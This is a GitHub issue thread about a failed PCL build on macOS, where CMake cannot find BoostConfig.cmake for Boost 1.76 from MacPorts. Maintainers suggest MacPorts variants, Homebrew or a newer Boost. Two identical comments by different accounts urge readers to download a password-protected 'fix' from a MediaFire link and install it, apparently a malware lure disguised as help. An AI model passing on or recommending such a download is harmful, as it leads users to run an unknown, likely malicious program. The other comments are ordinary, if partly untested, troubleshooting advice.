### ISSUE TITLE
[compile error] "Could not find a package configuration file provided by "Boost"

### ISSUE THREAD

**Issue by tnmoon** [PointCloudLibrary/pcl#6118]
**Describe the error**

Please paste the compilation results/errors.

> CMake Error at cmake/pcl_find_boost.cmake:29 (find_package):
>   Could not find a package configuration file provided by "Boost" (requested
>   version 1.71.0) with any of the following names:
> 
>     BoostConfig.cmake
>     boost-config.cmake
> 
>   Add the installation prefix of "Boost" to CMAKE_PREFIX_PATH or set
>   "Boost_DIR" to a directory containing one of the above files.  If "Boost"
>   provides a separate development package or SDK, be sure it has been
>   installed.
> Call Stack (most recent call first):
>   CMakeLists.txt:411 (include)
> 
> 
> -- Configuring incomplete, errors occurred!

Provide a link to a live example, or an unambiguous set of steps to reproduce this bug. A reproducible example helps to provide faster answers. Custom OS, custom PCL configs or custom build systems make the issue difficult to reproduce.

> $ mkdir build
> $ cd build
> $ cmake ..

**Screenshots/Code snippets/Build information**

<img width="543" alt="image" src="https://github.com/user-attachments/assets/def04f41-5908-4c77-91a8-a3030b500002">

**Your Environment (please complete the following information):**

 - OS: macOS 14.6.1 (23G93)
 - Compiler: cmake 3.30.2, AppleClang 15.0.0.15000309
 - PCL Version: master 6f1105a4
 - PCL Type: Compiled from source

If PCL was compiled from source or failure in compiling PCL itself:
 - GPU, Kinfu, CUDA enabled? Yes
 - List and Version of dependencies used: flann 1.9.2, Qhull 8.0.2, boost 1.76.0
 - Compilation flags are used: none

**Possible Solution**

maybe related to #6105, I have no idea that why my boost 1.76.0 installed from macport doesn't have boost-config.cmake file in /opt/local/lib/cmake directory.

<img width="394" alt="image" src="https://github.com/user-attachments/assets/7f7b3dc7-bc4d-46ca-9cb3-2b5456268cdf">

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by larshg** [comment]
Is it this version you have installed https://ports.macports.org/port/boost176/ - or just https://ports.macports.org/port/boost/ ?
Also, they mention in the bottom that:
# As of Boost 1.70.0, Boost provides CMake find scripts for itself
# that are installed by default. Those provided in 1.70.0 were broken
# in multiple ways; many fixed were added before 1.71.0. That said,
# we're not installing them by default at this time, but instead
# providing an option to install them for testing / evaluation
# purposes. We will likely enable these scripts in the future since it
# is likely that CMake will stop providing them once the
# Boost-provided version is stable.
variant cmake_scripts description {Install Boost CMake find scripts} {
    build.args-delete --no-cmake-config
}

I'm not a MacOS user, so I don't know how to enable this.

Alternatively can you install boost with brew, like its done on our CI's?

**Comment by larshg** [comment]
Alternatively try a newer boost also - ie -1.81 - though it mention the same about find scripts for boost being disabled by default.

**Comment by mvieth** [comment]
> I'm not a MacOS user, so I don't know how to enable this.

I believe this should enable the variant:
`sudo port install boost +cmake_scripts`
According to https://guide.macports.org/chunked/using.variants.html
However I am not sure whether "CMake find scripts" means `BoostConfig.cmake` or `FindBoost.cmake`?

**Comment by mvieth** [comment]
@tnmoon Any news? Did our suggestions help? If you do not respond, I will close this issue soon.

**Comment by timeparticle** [comment]
将 ".../pcl/cmake/pcl_find_boost.cmake" 中的 一行注释掉再试试 
find_package(Boost 1.71.0 QUIET COMPONENTS ${BOOST_OPTIONAL_MODULES} CONFIG)
# find_package(Boost 1.71.0 REQUIRED COMPONENTS ${BOOST_REQUIRED_MODULES} CONFIG)

**Comment by yezhengli-Mr9** [comment]
Can this be debugged out on windows?
